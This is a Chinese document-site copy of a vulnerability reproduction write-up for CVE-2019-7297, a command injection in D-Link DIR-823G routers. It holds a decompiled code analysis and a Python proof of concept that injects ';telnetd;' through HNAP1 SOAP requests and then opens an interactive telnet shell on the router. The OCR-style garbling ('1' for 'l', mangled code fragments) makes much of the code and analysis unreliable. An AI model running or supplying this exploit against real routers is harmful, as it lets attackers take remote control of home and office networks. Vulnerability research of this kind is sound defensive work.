《(CVE-2019-7297)D-Link DIR-823G 命令注入漏洞.docx》由会员分享,可在线阅读,更多相关《(CVE-2019-7297)D-Link DIR-823G 命令注入漏洞.docx(4页珍藏版)》请在第一文库网上搜索。
1、(CVE-2019-7297)D-1inkDIR-823G命令注入漏洞一、漏洞简介D-1inkDIR823G1.02B03及之前的版本中存在命令注入漏洞,攻击者可通过发送带有she11元字符的特制/HNAP1请求利用该漏洞执行任意的操作系统命令。GetNetworkTomographyResu1t函数中调用system函数,执行的内容中包括不受信任的用户输入AddreSS字段,攻击者可以远程执行任意命令。二、漏洞影响D-1inkDIR823G1.02B03及之前的版本三、复现过程漏洞分析漏洞原理中提到的GetNetworkTOniographyResu1t函数是在goahead二进制文件中实现
2、的。在FunctionJist中找到对应而函数地址。GetNetWOrkTOmOgraPhyReSUIt获取address,number,SiZe参数,作为Ping的参数。,rr.ajub_get(putsCerror,pmbgetMIBePINGeNUMBEK);)e1se(strcat(acStack2S2r*-cw);pr1ntf(char)$,:-Qd-vdrnuxertr1en(char),9Wic;-,(char)4.,Var1psabs9ec(0xU749size);if(Var1-O)put.sC,error,epoxbgetMIB_PIHG_5XZf);)e1se(9trcA
3、tft:tac-:rw-9);spr1ntf(char)_二JW.e:工20);_n*r1en(char)1oc1_120);trac4t(:3r(car)t._:,_:,“9trcttappng.tx2txppng.tx);Puts(AcStazaJIfiC);syaten(-:Sta:c2eo);_3tr*ar-fopen(auppng.txt*vrIf(_itreax0x0)(puts(tppng.tMtisNU11):pingaddress-cnumber-wnumber-ssizetmpping.txt2tmpping.tt但在system之前并没有对这些外来参数进行检查,如果add
4、ress为;te1netd;就能启动Te1net服务。可以看出这些参数都是通过apmib_get获取的,那么在之前一定有apmib_set进行设置,在IDA中查找关键字0x1b72,0x1b73,0x1b73,定位到apmib_set的位置,结合ghidra的反汇编代码,确定在SetNetworkTomographySettings函数中可以对这些参数进行设置。,4t1H*11oS3%rin9(0t1FnC.?pocimportrequestsfrompwnimport*IP=192.168.0.1,headers=requests.uti1s.defau1t_headers()headers
5、User-Agent=,Mozi11a5.0(WindowsNT10.0;Win64;64)App1eWebKit/537.36(KHTM1,1ikeGecko)Chrome/56.0.2924.76Safari/537.36headersSOAPAction=,headers,Content-Type=tetm1;Charset=UTF-8headersAccept=*/*headersAccept-Encoding=gzip,def1ateheadersAccept-1anguage=,zh-CNjzh;q=0.9,en;q=0.8pay1oad=jte1netd;44,r=requests.post(,http:/+IP+HNAP1,iheaders=headersdata=pay1oad)printr.textheadersSOAPAction=,http:/ZHNAP1GetNetworkTomographyResu1t,pay1oad=r=requests.post(http:/,+IP+HNAP1,iheaders=headersjdata=pay1oad)printr.textp=remote(IP,23)p.interactive(